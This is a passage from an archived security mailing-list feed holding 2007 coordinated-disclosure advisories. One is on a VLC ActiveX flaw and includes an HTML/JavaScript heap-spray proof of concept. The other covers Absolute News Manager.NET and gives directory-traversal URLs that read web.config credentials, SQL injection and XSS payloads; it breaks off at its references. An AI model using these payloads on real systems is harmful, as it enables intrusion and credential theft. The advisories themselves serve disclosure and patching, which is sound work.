&lt;br&gt;Version: GnuPG v1.4.6 (GNU/Linux)
&lt;br&gt;&lt;br&gt;iD8DBQFHVuh586n/Gc8U/uARAv1iAJ9Bd0AHbbJYSVDHCjunVqSt/8wuTwCfU2qj
&lt;br&gt;HAfK0DW2cJ4+nR9hH2nOOmk=
&lt;br&gt;=ZQXL
&lt;br&gt;-----END PGP SIGNATURE-----
&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/Cisco-Security-Advisory%3A-Cisco-Security-Agent-for-Windows-System-Driver-Remote-Buffer-Overflow-Vulnerability-tp14179910p14179910.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-14157873</id>
	<title>CORE-2007-1004: VLC Activex Bad Pointer Initialization Vulnerability</title>
	<published>2007-12-04T08:26:02Z</published>
	<updated>2007-12-04T08:26:02Z</updated>
	<author>
		<name>Core Security Technologies Advisories</name>
	</author>
	<content type="html">-----BEGIN PGP SIGNED MESSAGE-----
&lt;br&gt;Hash: SHA1
&lt;br&gt;&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Core Security Technologies – CoreLabs Advisory
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;a href=&quot;http://www.coresecurity.com/corelabs&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.coresecurity.com/corelabs&lt;/a&gt;&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; VLC Activex Bad Pointer Initialization Vulnerability
&lt;br&gt;&lt;br&gt;*Advisory Information*
&lt;br&gt;Title: VLC Activex Bad Pointer Initialization Vulnerability
&lt;br&gt;Advisory ID: CORE-2007-1004
&lt;br&gt;Advisory URL: &lt;a href=&quot;http://www.coresecurity.com/?action=item&amp;id=2035&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.coresecurity.com/?action=item&amp;id=2035&lt;/a&gt;&lt;br&gt;Date published: 2007-12-04
&lt;br&gt;Date of last update: 2007-12-03
&lt;br&gt;Vendors contacted: VLC
&lt;br&gt;Release mode: Coordinated Release
&lt;br&gt;&lt;br&gt;*Vulnerability Information*
&lt;br&gt;Class: Access validation error
&lt;br&gt;Remotely Exploitable: Yes
&lt;br&gt;Locally Exploitable: No
&lt;br&gt;Bugtraq ID: N/A
&lt;br&gt;CVE Name: N/A
&lt;br&gt;&lt;br&gt;*Vulnerability Description*
&lt;br&gt;VLC player is a popular multimedia player for various audio and video
&lt;br&gt;formats, and various streaming protocols.
&lt;br&gt;&lt;br&gt;A vulnerability has been found in the ActiveX control DLL (axvlc.dll)
&lt;br&gt;used by VLC player. This library contains three methods whose parameters
&lt;br&gt;are not correctly checked, and may produce a bad initialized pointer. By
&lt;br&gt;providing these functions specially crafted parameters, an attacker can
&lt;br&gt;overwrite memory zones and execute arbitrary code.
&lt;br&gt;&lt;br&gt;*Vulnerable packages*
&lt;br&gt;VLC media player version 0.86, 0.86a, 0.86b y 0.86c.
&lt;br&gt;&lt;br&gt;*Non-vulnerable packages*
&lt;br&gt;VLC media player versions prior to 0.86.
&lt;br&gt;VLC media player version 0.86d.
&lt;br&gt;&lt;br&gt;*Vendor Information, Solutions and Workarounds*
&lt;br&gt;VLC media player 0.8.6d adresses this issue and introduces further
&lt;br&gt;usability fixes.
&lt;br&gt;&lt;br&gt;Download it from the VideoLAN project website: &lt;a href=&quot;http://www.videolan.org/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.videolan.org/&lt;/a&gt;&lt;br&gt;&lt;br&gt;*Credits*
&lt;br&gt;This vulnerability was discovered by Ricardo Narvaja (Ricnar) from the
&lt;br&gt;Exploit Writers team of Core Security Technologies.
&lt;br&gt;&lt;br&gt;*Technical Description / Proof of Concept Code*
&lt;br&gt;The ActiveX control DLL (axvlc.dll) contains three methods whose
&lt;br&gt;parameters are not correctly checked, and may produce a bad initialized
&lt;br&gt;pointer. By providing these functions specially crafted parameters, an
&lt;br&gt;attacker can overwrite memory zones and execute arbitrary code.
&lt;br&gt;&lt;br&gt;The vulnerable functions are:
&lt;br&gt;&lt;br&gt;Sub addTarget (
&lt;br&gt;ByVal uri As String ,
&lt;br&gt;ByVal options As Variant ,
&lt;br&gt;ByVal mode As VLCPlaylistMode ,
&lt;br&gt;ByVal Position As Long)
&lt;br&gt;&lt;br&gt;Function getVariable (ByVal name As String)
&lt;br&gt;&lt;br&gt;Sub setVariable (
&lt;br&gt;ByVal name As String ,
&lt;br&gt;ByVal value As Variant)
&lt;br&gt;&lt;br&gt;The parameters declared as String are the cause of the vulnerability.
&lt;br&gt;&lt;br&gt;The following assembly code is where the axvlc.dll library crashes. The
&lt;br&gt;pointer that is read to be executed, can be overwritten, depending on how
&lt;br&gt;the strings are sent. It also requires that previously other files are
&lt;br&gt;loaded that left the pointer bad initialized, with the value that the
&lt;br&gt;attacker needs to jump to his own code.
&lt;br&gt;&lt;br&gt;000113CD &amp;nbsp; &amp;nbsp;FF50 14 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; CALL DWORD PTR DS:[EAX+14]
&lt;br&gt;000113D0 &amp;nbsp; &amp;nbsp;8B53 08 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; MOV EDX,DWORD PTR DS:[EBX+8]
&lt;br&gt;000113D3 &amp;nbsp; &amp;nbsp;85D2 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;TEST EDX,EDX
&lt;br&gt;&lt;br&gt;The following is a PoC HTML file, using one of the vulnerable methods
&lt;br&gt;(addTarget).
&lt;br&gt;&lt;br&gt;&amp;lt;html&amp;gt;
&lt;br&gt;&amp;lt;head&amp;gt;
&lt;br&gt;&amp;lt;object classid='clsid:E23FE9C6-778E-49D4-B537-38FCDE4887D8'
&lt;br&gt;id='target' &amp;gt;&amp;lt;/object&amp;gt;
&lt;br&gt;&amp;lt;/head&amp;gt;
&lt;br&gt;&amp;lt;body&amp;gt;
&lt;br&gt;&amp;nbsp; &amp;nbsp;&amp;lt;script&amp;gt;
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; var mm &amp;nbsp;= null;
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; if( target != null )
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; {
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;var param1 = unescape(&amp;quot;%u0505%u0505&amp;quot;);
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;var salame = &amp;quot;defaultV&amp;quot;;
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;var salame2 = 1;
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;var salame3 = 0;
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;ag &amp;nbsp; = unescape(&amp;quot;%uCCCC%uCCCC&amp;quot;);
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;sh &amp;nbsp; =
&lt;br&gt;unescape(&amp;quot;%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%&amp;quot;);
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;sz &amp;nbsp; = sh.length * 2;
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;npsz = 0x400000 - (sz + 0x38);
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;nps &amp;nbsp;= unescape(&amp;quot;%u0505%u0505&amp;quot;);
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;while(nps.length * 2 &amp;lt; npsz) nps += nps;
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;ihbc = (0x0E000000 - 0x400000) / 0x400000;
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;mm &amp;nbsp; = new Array();
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;for(i = 0; i &amp;lt;= ihbc; i++) mm[i] = nps + sh;
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;for(var i=0;i&amp;lt;2000;i++)
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; param1 = param1 + unescape(&amp;quot;%u0505%u0505&amp;quot;);
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; 
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;target.getVariable (param1);
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; }
&lt;br&gt;&amp;nbsp; &amp;nbsp;&amp;lt;/script&amp;gt;
&lt;br&gt;&amp;lt;/body&amp;gt;
&lt;br&gt;&amp;lt;/html&amp;gt;
&lt;br&gt;&lt;br&gt;&lt;br&gt;*Additional information*
&lt;br&gt;[1] Practical demonstration of VLC ActiveX vulnerability
&lt;br&gt;&lt;a href=&quot;http://www.coresecurity.com/files/attachments/CORE-2007-1004-VLC-tutorial.pdf&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.coresecurity.com/files/attachments/CORE-2007-1004-VLC-tutorial.pdf&lt;/a&gt;&lt;br&gt;&lt;br&gt;*Report Timeline*
&lt;br&gt;2007-10-26: Core notifies the VLC team of the vulnerability.
&lt;br&gt;2007-10-29: Technical details sent by Core to VLC.
&lt;br&gt;2007-11-23: VLC notifies Core that a fix has been produced, and will be
&lt;br&gt;released in VLC version 0.8.6d.
&lt;br&gt;2007-11-30: VLC releases version 0.8.6d, which fixes this vulnerability.
&lt;br&gt;2007-12-04: CORE-2007-1004 advisory is published.
&lt;br&gt;&lt;br&gt;*About Corelabs*
&lt;br&gt;CoreLabs, the research center of Core Security Technologies, is charged
&lt;br&gt;with anticipating the future needs and requirements for information
&lt;br&gt;security technologies.
&lt;br&gt;We conduct our research in several important areas of computer security
&lt;br&gt;including system vulnerabilities, cyber attack planning and simulation,
&lt;br&gt;source code auditing, and cryptography. Our results include problem
&lt;br&gt;formalization, identification of vulnerabilities, novel solutions and
&lt;br&gt;prototypes for new technologies.
&lt;br&gt;CoreLabs regularly publishes security advisories, technical papers,
&lt;br&gt;project information and shared software tools for public use at:
&lt;br&gt;&lt;a href=&quot;http://www.coresecurity.com/corelabs/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.coresecurity.com/corelabs/&lt;/a&gt;&lt;br&gt;&lt;br&gt;*About Core Security Technologies*
&lt;br&gt;Core Security Technologies develops strategic solutions that help
&lt;br&gt;security-conscious organizations worldwide develop and maintain a
&lt;br&gt;proactive process for securing their networks. The company's flagship
&lt;br&gt;product, CORE IMPACT, is the most comprehensive product for performing
&lt;br&gt;enterprise security assurance testing. IMPACT evaluates network, endpoint
&lt;br&gt;and end-user vulnerabilities and identifies what resources are exposed.
&lt;br&gt;It enables organizations to determine if current security investments are
&lt;br&gt;detecting and preventing attacks. Core augments its leading technology
&lt;br&gt;solution with world-class security consulting services, including
&lt;br&gt;penetration testing and software security auditing. Based in Boston, MA
&lt;br&gt;and Buenos Aires, Argentina, Core Security Technologies can be reached at
&lt;br&gt;617-399-6980 or on the Web at
&lt;br&gt;&lt;a href=&quot;http://www.coresecurity.com&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.coresecurity.com&lt;/a&gt;.
&lt;br&gt;&lt;br&gt;*DISCLAIMER*
&lt;br&gt;The contents of this advisory are copyright (c) 2007 CORE Security
&lt;br&gt;Technologies and (c) 2007 CoreLabs, and may be distributed freely
&lt;br&gt;provided that no fee is charged for this distribution and proper credit
&lt;br&gt;is given.
&lt;br&gt;&lt;br&gt;*PGP/GPG KEYS*
&lt;br&gt;This advisory has been signed with the GPG key of Core Security
&lt;br&gt;Technologies advisories team, which is available for download at
&lt;br&gt;&lt;a href=&quot;http://www.coresecurity.com/files/attachments/core_security_advisories.asc&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.coresecurity.com/files/attachments/core_security_advisories.asc&lt;/a&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;-----BEGIN PGP SIGNATURE-----
&lt;br&gt;Version: GnuPG v1.4.7 (MingW32)
&lt;br&gt;&lt;br&gt;iD8DBQFHVX+ayNibggitWa0RAuaNAJ9TKYfpopNcnuAwycq9wqKeacoGggCgnrxn
&lt;br&gt;J8l/kRHXfxvHQ0lFJIbvRkk=
&lt;br&gt;=gYOg
&lt;br&gt;-----END PGP SIGNATURE-----
&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/CORE-2007-1004%3A-VLC-Activex-Bad-Pointer-Initialization-Vulnerability-tp14157873p14157873.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-14154732</id>
	<title>PR07-39: Multiple vulnerabilities on Absolute News Manager.NET 5.1 including file retrieval and SQL injection</title>
	<published>2007-12-04T06:32:03Z</published>
	<updated>2007-12-04T06:32:03Z</updated>
	<author>
		<name>Adrian Pastor</name>
	</author>
	<content type="html">-----BEGIN PGP SIGNED MESSAGE-----
&lt;br&gt;Hash: SHA1
&lt;br&gt;&lt;br&gt;&lt;br&gt;PR07-39: Multiple vulnerabilities on Absolute News Manager.NET 5.1
&lt;br&gt;including file retrieval and SQL injection
&lt;br&gt;&lt;br&gt;Vulnerabilities found: 16 November 2007
&lt;br&gt;&lt;br&gt;Vendor informed: 19 November 2007
&lt;br&gt;&lt;br&gt;Vulnerability fixed: 28 November 2007
&lt;br&gt;&lt;br&gt;Severity: High
&lt;br&gt;&lt;br&gt;Description:
&lt;br&gt;&lt;br&gt;Multiple vulnerabilities were found on Absolute News Manager.NET 5.1:
&lt;br&gt;&lt;br&gt;- - unauthenticated file retrieval (directory traversal) on
&lt;br&gt;'/pages/default.aspx'
&lt;br&gt;&lt;br&gt;- - unauthenticated SQL injection on 'xlaabsolutenm.aspx' and possibly
&lt;br&gt;'/pages/default.aspx'
&lt;br&gt;&lt;br&gt;- - XSS on 'xlaabsolutenm.aspx' and '/pages/default.aspx'
&lt;br&gt;&lt;br&gt;- - webroot disclosure on 'getpath.aspx'
&lt;br&gt;&lt;br&gt;&lt;br&gt;File retrieval PoC:
&lt;br&gt;&lt;br&gt;The following URL shows the contents of .NET 'web.config' (contains DB
&lt;br&gt;credentials):
&lt;br&gt;&lt;a href=&quot;http://target.tld/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://target.tld/&lt;/a&gt;[CustomerDefinedDir]/pages/default.aspx?a=1&amp;template=../web.config
&lt;br&gt;&lt;br&gt;The following URL show contents of the vulnerable script:
&lt;br&gt;&lt;a href=&quot;http://target.tld/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://target.tld/&lt;/a&gt;[CustomerDefinedDir]/pages/default.aspx?a=1&amp;template=default.aspx%00
&lt;br&gt;&lt;br&gt;Note: in order to obtain the content of '.aspx' files, a null byte '%00'
&lt;br&gt;must be added after the filename.
&lt;br&gt;&lt;br&gt;Show content of other scripts:
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://target.tld/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://target.tld/&lt;/a&gt;[CustomerDefinedDir]/pages/?a=1&amp;template=../anmviewer.ascx%00
&lt;br&gt;&lt;a href=&quot;http://target.tld/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://target.tld/&lt;/a&gt;[CustomerDefinedDir]/pages/?a=1&amp;template=../default.aspx%00
&lt;br&gt;&lt;a href=&quot;http://target.tld/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://target.tld/&lt;/a&gt;[CustomerDefinedDir]/pages/?a=1&amp;template=../PPL1HistoryTicker.aspx%00
&lt;br&gt;&lt;a href=&quot;http://target.tld/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://target.tld/&lt;/a&gt;[CustomerDefinedDir]/pages/?a=1&amp;template=../xlagc.ascx%00
&lt;br&gt;&lt;a href=&quot;http://target.tld/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://target.tld/&lt;/a&gt;[CustomerDefinedDir]/pages/?a=1&amp;template=../xlaabsolutenm.aspx%00
&lt;br&gt;&lt;a href=&quot;http://target.tld/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://target.tld/&lt;/a&gt;[CustomerDefinedDir]/pages/?a=1&amp;template=../streamconfig.aspx%00
&lt;br&gt;&lt;a href=&quot;http://target.tld/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://target.tld/&lt;/a&gt;[CustomerDefinedDir]/pages/?a=1&amp;template=../incSystem.aspx%00
&lt;br&gt;&lt;a href=&quot;http://target.tld/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://target.tld/&lt;/a&gt;[CustomerDefinedDir]/pages/?a=1&amp;template=../articlefiles/r.asp%00
&lt;br&gt;&lt;a href=&quot;http://target.tld/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://target.tld/&lt;/a&gt;[CustomerDefinedDir]/pages/?a=1&amp;template=../incSystem.aspx%00
&lt;br&gt;&lt;br&gt;&lt;br&gt;SQL injection PoCs:
&lt;br&gt;&lt;br&gt;Vulnerable script: /[CustomerDefinedDir]/xlaabsolutenm.aspx
&lt;br&gt;Vulnerable parameters: z, pz, ord, sort
&lt;br&gt;&lt;br&gt;Requesting the following URL returns the version of Windows and SQL server:
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://target.tld/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://target.tld/&lt;/a&gt;[CustomerDefinedDir]/xlaabsolutenm.aspx?z=@@version&amp;pz=9&amp;featured=n&amp;ord=desc&amp;sort=posted&amp;rmore=-&amp;
&lt;br&gt;&lt;br&gt;System.Data.SqlClient.SqlException: Conversion failed when converting
&lt;br&gt;the nvarchar value 'Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86)
&lt;br&gt;Feb &amp;nbsp;9 2007 22:47:07 Copyright (c) 1988-2005 Microsoft Corporation
&lt;br&gt;Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' to
&lt;br&gt;data type int.
&lt;br&gt;&lt;br&gt;Other URLs:
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://target.tld/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://target.tld/&lt;/a&gt;[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10&amp;ord=asc&amp;sort=headline'INJECTED_PAYLOAD&amp;rmore=-&amp;
&lt;br&gt;&lt;a href=&quot;http://target.tld/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://target.tld/&lt;/a&gt;[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10&amp;ord=asc'INJECTED_PAYLOAD&amp;sort=headline&amp;rmore=-&amp;
&lt;br&gt;&lt;a href=&quot;http://target.tld/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://target.tld/&lt;/a&gt;[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10'INJECTED_PAYLOAD&amp;ord=asc&amp;sort=headline&amp;rmore=-&amp;
&lt;br&gt;&lt;a href=&quot;http://target.tld/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://target.tld/&lt;/a&gt;[CustomerDefinedDir]/xlaabsolutenm.aspx?z=15'INJECTED_PAYLOAD&amp;ss=y&amp;size=1.1em&amp;target=iframe&amp;
&lt;br&gt;&lt;a href=&quot;http://target.tld/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://target.tld/&lt;/a&gt;[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4&amp;pz=21&amp;ord=asc&amp;sort=headline'INJECTED_PAYLOAD&amp;
&lt;br&gt;&lt;a href=&quot;http://target.tld/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://target.tld/&lt;/a&gt;[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4&amp;pz=21&amp;ord=asc'INJECTED_PAYLOAD&amp;sort=headline&amp;
&lt;br&gt;&lt;a href=&quot;http://target.tld/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://target.tld/&lt;/a&gt;[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4&amp;pz=21'INJECTED_PAYLOAD&amp;ord=asc&amp;sort=headline&amp;
&lt;br&gt;&lt;a href=&quot;http://target.tld/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://target.tld/&lt;/a&gt;[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4'INJECTED_PAYLOAD&amp;pz=21&amp;ord=asc&amp;sort=headline&amp;
&lt;br&gt;&lt;a href=&quot;http://target.tld/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://target.tld/&lt;/a&gt;[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&amp;ord=desc&amp;sort=posted'INJECTED_PAYLOAD&amp;featured=n&amp;
&lt;br&gt;&lt;a href=&quot;http://target.tld/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://target.tld/&lt;/a&gt;[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&amp;ord=desc'INJECTED_PAYLOAD&amp;sort=posted&amp;featured=n&amp;
&lt;br&gt;&lt;a href=&quot;http://target.tld/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://target.tld/&lt;/a&gt;[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&amp;pz=8'INJECTED_PAYLOAD&amp;featured=only&amp;
&lt;br&gt;&lt;a href=&quot;http://target.tld/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://target.tld/&lt;/a&gt;[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&amp;pz=9&amp;featured=n&amp;ord=desc&amp;sort=posted'INJECTED_PAYLOAD&amp;rmore=-&amp;
&lt;br&gt;&lt;a href=&quot;http://target.tld/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://target.tld/&lt;/a&gt;[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&amp;pz=9&amp;featured=n&amp;ord=desc'INJECTED_PAYLOAD&amp;sort=posted&amp;rmore=-&amp;
&lt;br&gt;&lt;a href=&quot;http://target.tld/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://target.tld/&lt;/a&gt;[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&amp;pz=9'INJECTED_PAYLOAD&amp;featured=n&amp;ord=desc&amp;sort=posted&amp;rmore=-&amp;
&lt;br&gt;&lt;a href=&quot;http://target.tld/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://target.tld/&lt;/a&gt;[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6'INJECTED_PAYLOAD&amp;ord=desc&amp;sort=posted&amp;featured=n&amp;
&lt;br&gt;&lt;a href=&quot;http://target.tld/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://target.tld/&lt;/a&gt;[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6'INJECTED_PAYLOAD&amp;pz=8&amp;featured=only&amp;
&lt;br&gt;&lt;a href=&quot;http://target.tld/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://target.tld/&lt;/a&gt;[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6'INJECTED_PAYLOAD&amp;pz=9&amp;featured=n&amp;ord=desc&amp;sort=posted&amp;rmore=-&amp;
&lt;br&gt;&lt;a href=&quot;http://target.tld/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://target.tld/&lt;/a&gt;[CustomerDefinedDir]/xlaabsolutenm.aspx?z=7&amp;ord=desc&amp;sort=posted'INJECTED_PAYLOAD&amp;
&lt;br&gt;&lt;a href=&quot;http://target.tld/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://target.tld/&lt;/a&gt;[CustomerDefinedDir]/xlaabsolutenm.aspx?z=7&amp;ord=desc'INJECTED_PAYLOAD&amp;sort=posted&amp;
&lt;br&gt;&lt;a href=&quot;http://target.tld/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://target.tld/&lt;/a&gt;[CustomerDefinedDir]/xlaabsolutenm.aspx?z=7'INJECTED_PAYLOAD&amp;ord=desc&amp;sort=posted&amp;
&lt;br&gt;&lt;br&gt;The script '/pages/default.aspx' might also be vulnerable to SQL
&lt;br&gt;injection but it has not been confirmed.
&lt;br&gt;&lt;br&gt;Requesting the following URLs:
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://target.tld/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://target.tld/&lt;/a&gt;[CustomerDefinedDir]/pages/default.aspx?a=40&amp;z=9999999999999
&lt;br&gt;&lt;a href=&quot;http://target.tld/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://target.tld/&lt;/a&gt;[CustomerDefinedDir]/pages/default.aspx?a=9999999999999&amp;z=1
&lt;br&gt;&lt;br&gt;return the following error:
&lt;br&gt;&lt;br&gt;System.Data.SqlClient.SqlException: Error converting data type nvarchar
&lt;br&gt;to int.
&lt;br&gt;&lt;br&gt;&lt;br&gt;XSS PoCs:
&lt;br&gt;&lt;br&gt;Vulnerable script: '/xlaabsolutenm.aspx'
&lt;br&gt;Unsanitized parameter: 'rmore'
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://target.tld/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://target.tld/&lt;/a&gt;[CustomerDefinedDir]/xlaabsolutenm.aspx?z=1,7&amp;sort=articleID&amp;ord=desc&amp;rmore=%3Cscript%3Ealert(1)%3C/script%3E&amp;size=2&amp;h=abc&amp;isframe=y
&lt;br&gt;&lt;br&gt;Vulnerable script: '/pages/default.aspx'
&lt;br&gt;Unsanitized parameter: 'template'
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://target.tld/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://target.tld/&lt;/a&gt;[CustomerDefinedDir]/pages/?a=1&amp;template=%3Cscript%3Ealert(2)%3C/script%3E
&lt;br&gt;&lt;br&gt;Webroot PoC:
&lt;br&gt;&lt;br&gt;Requesting the 'getpath.aspx' demo script discloses the physical path of
&lt;br&gt;the webroot - ie:
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://target.tld/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://target.tld/&lt;/a&gt;[CustomerDefinedDir]/getpath.aspx
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;quot;
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Absolute News Manager Physical Path :
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; D:\inetpub\target.tld\[CustomerDefinedDir]\
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Please delete this file from your installation.
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;quot;
&lt;br&gt;&lt;br&gt;Consequences:
&lt;br&gt;&lt;br&gt;Contents of any files on the web server can be obtained. Unauthorized
&lt;br&gt;SQL queries can be injected. Scripting code can be run within the
&lt;br&gt;security context of the target domain. Information about the target
&lt;br&gt;environment can be extracted.
&lt;br&gt;&lt;br&gt;Fix:
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://www.xigla.com/security/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.xigla.com/security/&lt;/a&gt;&lt;br&gt;&lt;a href=&quot;http://www.xigla.com/security/ANMNET51-SecurityUpdate20071128.zip&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.xigla.com/security/ANMNET51-SecurityUpdate20071128.zip&lt;/a&gt;&lt;br&gt;&lt;br&gt;Note: ProCheckUp has NOT tested the patch provided by Xigla Software.
&lt;br&gt;&lt;br&gt;&lt;br&gt;References:
